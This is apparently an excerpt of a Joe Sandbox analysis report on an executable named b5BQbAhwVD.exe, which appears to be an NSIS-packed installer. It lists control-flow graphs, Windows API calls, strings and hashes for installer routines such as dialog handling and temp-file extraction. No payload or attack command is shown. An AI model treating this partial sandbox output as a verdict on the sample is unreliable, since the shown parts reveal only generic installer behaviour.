                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                  • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                  • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                  • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00406736
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                  • String ID: xgB
                                                                                                                  • API String ID: 2295610775-399326502
                                                                                                                  • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                  • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                                  • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                  • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 264 404037-40404c 262->264 265 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->265 263->262 266 403eaa-403eb3 263->266 270 40408c-404091 call 4043ab 264->270 271 40404e-404051 264->271 265->264 267 403eb5-403ec2 SetWindowPos 266->267 268 403ec8-403ecb 266->268 267->268 272 403ee5-403eeb 268->272 273 403ecd-403edf ShowWindow 268->273 283 404096-4040b1 270->283 275 404053-40405e call 401389 271->275 276 404084-404086 271->276 278 403f07-403f0a 272->278 279 403eed-403f02 DestroyWindow 272->279 273->272 275->276 298 404060-40407f SendMessageW 275->298 276->270 282 40432c 276->282 289 403f0c-403f18 SetWindowLongW 278->289 290 403f1d-403f23 278->290 286 404309-40430f 279->286 288 40432e-404335 282->288 284 4040b3-4040b5 call 40140b 283->284 285 4040ba-4040c0 283->285 284->285 294 4040c6-4040d1 285->294 295 4042ea-404303 DestroyWindow EndDialog 285->295 286->282 293 404311-404317 286->293 289->288 296 403fc6-403fd4 call 4043c6 290->296 297 403f29-403f3a GetDlgItem 290->297 293->282 299 404319-404322 ShowWindow 293->299 294->295 300 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->300 295->286 296->288 301 403f59-403f5c 297->301 302 403f3c-403f53 SendMessageW IsWindowEnabled 297->302 298->288 299->282 331 404126-40412b 300->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 300->332 305 403f61-403f64 301->305 306 403f5e-403f5f 301->306 302->282 302->301 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->296 312 403f79-403f7f 310->312 313 403fad-403fc0 SendMessageW 310->313 311->313 316 403f6e-403f70 311->316 317 403f81-403f87 call 40140b 312->317 318 403f96-403f9f call 40140b 312->318 313->296 316->309 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->309 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->286 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->286 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->286
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                  • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                  • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                                  • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                  • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                                  • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                  • String ID: (7B
                                                                                                                  • API String ID: 3282139019-3251261122
                                                                                                                  • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                  • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                                  • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                  • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 395 403bc2-403bc6 390->395 391->392 393 403cd5-403cdd call 40140b 392->393 394 403c56-403c86 RegisterClassW 392->394 409 403ce7-403cf2 call 403dae 393->409 410 403cdf-403ce2 393->410 397 403da4 394->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 394->398 400 403bd8-403be4 lstrlenW 395->400 401 403bc8-403bd5 call 405cea 395->401 402 403da6-403dad 397->402 398->393 403 403be6-403bf4 lstrcmpiW 400->403 404 403c0c-403c14 call 405cbd call 4063e8 400->404 401->400 403->404 408 403bf6-403c00 GetFileAttributesW 403->408 404->384 412 403c02-403c04 408->412 413 403c06-403c07 call 405d09 408->413 419 403cf8-403d12 ShowWindow call 406752 409->419 420 403d7b-403d83 call 405523 409->420 410->402 412->404 412->413 413->404 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->410 431 403d91-403d98 call 40140b 425->431 426->397 427->428 429 403d32-403d42 GetClassInfoW RegisterClassW 428->429 430 403d48-403d6b DialogBoxParamW call 40140b 428->430 429->430 436 403d70-403d79 call 403a28 430->436 431->410 436->402
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                  • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\b5BQbAhwVD.exe",00000000), ref: 00403B59
                                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Iw,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Iw,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Iw), ref: 00403C40
                                                                                                                    • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                  • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                                  • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                  • String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Iw$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                  • API String ID: 1975747703-2799127187
                                                                                                                  • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                                  • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                                  • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                                  • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 460 403187-40318c 452->460 461 4030bc-4030bf 452->461 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 462 403143-40314b call 402e8e 456->462 463 402fec-402ff2 456->463 460->445 464 4030c1-4030d9 call 40345d call 403447 461->464 465 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 461->465 462->460 466 403072-403076 463->466 467 402ff4-40300c call 405e99 463->467 464->460 488 4030df-4030e5 464->488 491 403139-40313e 465->491 492 40314d-40317d call 40345d call 4031d6 465->492 471 403078-40307e call 402e8e 466->471 472 40307f-403085 466->472 467->472 486 40300e-403015 467->486 471->472 479 403087-403095 call 4068b5 472->479 480 403098-4030a2 472->480 479->480 480->452 480->453 486->472 490 403017-40301e 486->490 488->460 488->465 490->472 493 403020-403027 490->493 491->445 499 403182-403185 492->499 493->472 495 403029-403030 493->495 495->472 497 403032-403052 495->497 497->460 500 403058-40305c 497->500 499->460 501 40318e-40319f 499->501 502 403064-40306c 500->502 503 40305e-403062 500->503 504 4031a1 501->504 505 4031a7-4031ac 501->505 502->472 506 40306e-403070 502->506 503->452 503->502 504->505 507 4031ad-4031b3 505->507 506->472 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                                  APIs
                                                                                                                  • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\b5BQbAhwVD.exe,00000400), ref: 00402F60
                                                                                                                    • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\b5BQbAhwVD.exe,80000000,00000003), ref: 00405EE2
                                                                                                                    • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\b5BQbAhwVD.exe,C:\Users\user\Desktop\b5BQbAhwVD.exe,80000000,00000003), ref: 00402FA9
                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0
                                                                                                                  Strings
                                                                                                                  • Error launching installer, xrefs: 00402F80
                                                                                                                  • soft, xrefs: 00403020
                                                                                                                  • C:\Users\user\Desktop\b5BQbAhwVD.exe, xrefs: 00402F4A, 00402F59, 00402F6D, 00402F8A
                                                                                                                  • Inst, xrefs: 00403017
                                                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                                  • "C:\Users\user\Desktop\b5BQbAhwVD.exe", xrefs: 00402F30
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F3D, 00403108
                                                                                                                  • Null, xrefs: 00403029
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                  • String ID: "C:\Users\user\Desktop\b5BQbAhwVD.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\b5BQbAhwVD.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                  • API String ID: 2803837635-1167483307
                                                                                                                  • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                  • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                                  • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                  • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 575 40640a-406415 576 406417-406426 575->576 577 406428-40643e 575->577 576->577 578 406444-406451 577->578 579 406656-40665c 577->579 578->579 582 406457-40645e 578->582 580 406662-40666d 579->580 581 406463-406470 579->581 583 406678-406679 580->583 584 40666f-406673 call 4063e8 580->584 581->580 585 406476-406482 581->585 582->579 584->583 587 406643 585->587 588 406488-4064c6 585->588 591 406651-406654 587->591 592 406645-40664f 587->592 589 4065e6-4065ea 588->589 590 4064cc-4064d7 588->590 595 4065ec-4065f2 589->595 596 40661d-406621 589->596 593 4064f0 590->593 594 4064d9-4064de 590->594 591->579 592->579 600 4064f7-4064fe 593->600 594->593 597 4064e0-4064e3 594->597 598 406602-40660e call 4063e8 595->598 599 4065f4-406600 call 40632f 595->599 601 406630-406641 lstrlenW 596->601 602 406623-40662b call 40640a 596->602 597->593 603 4064e5-4064e8 597->603 613 406613-406619 598->613 599->613 605 406500-406502 600->605 606 406503-406505 600->606 601->579 602->601 603->593 609 4064ea-4064ee 603->609 605->606 611 406540-406543 606->611 612 406507-40652e call 4062b6 606->612 609->600 614 406553-406556 611->614 615 406545-406551 GetSystemDirectoryW 611->615 625 406534-40653b call 40640a 612->625 626 4065ce-4065d1 612->626 613->601 617 40661b 613->617 619 4065c1-4065c3 614->619 620 406558-406566 GetWindowsDirectoryW 614->620 618 4065c5-4065c9 615->618 622 4065de-4065e4 call 40667c 617->622 618->622 627 4065cb 618->627 619->618 624 406568-406572 619->624 620->619 622->601 629 406574-406577 624->629 630 40658c-4065a2 SHGetSpecialFolderLocation 624->630 625->618 626->622 632 4065d3-4065d9 lstrcatW 626->632 627->626 629->630 633 406579-406580 629->633 634 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 630->634 635 4065bd 630->635 632->622 637 406588-40658a 633->637 634->618 634->635 635->619 637->618 637->630
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                  • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384256546.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384368266.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_b5BQbAhwVD.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                  • API String ID: 717251189-1230650788
                                                                                                                  • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                                  • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                                  • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                                  • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 662 4017dd-4017ef 654->662 663 4017cd-4017db CompareFileTime 654->663 657 4017f7-4017f8 call 405eb9 655->657 658 4017fd-401819 call 405ede 655->658 657->658 665 40181b-40181e 658->665 666 40188d-4018b6 call 405450 call 4031d6 658->666 662->655 663->662 667 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->667 668 40186f-401879 call 405450 665->668 678 4018b8-4018bc 666->678 679 4018be-4018ca SetFileTime 666->679 667->653 700 401864-401865 667->700 680 401882-401888 668->680 678->679 683 4018d0-4018db CloseHandle 678->683 679->683 684 402ace 680->684 687 4018e1-4018e4 683->687 688 402ac5-402ac8 683->688 686 402ad0-402ad4 684->686 690 4018e6-4018f7 call 40640a lstrcatW 687->690 691 4018f9-4018fc call 40640a 687->691 688->684 697 401901-4022fc call 405a4e 690->697 691->697 697->686 700->680 702 401867-401868 700->702 702->668
                                                                                                                  APIs
                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2383814356.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2383728122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2384223170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
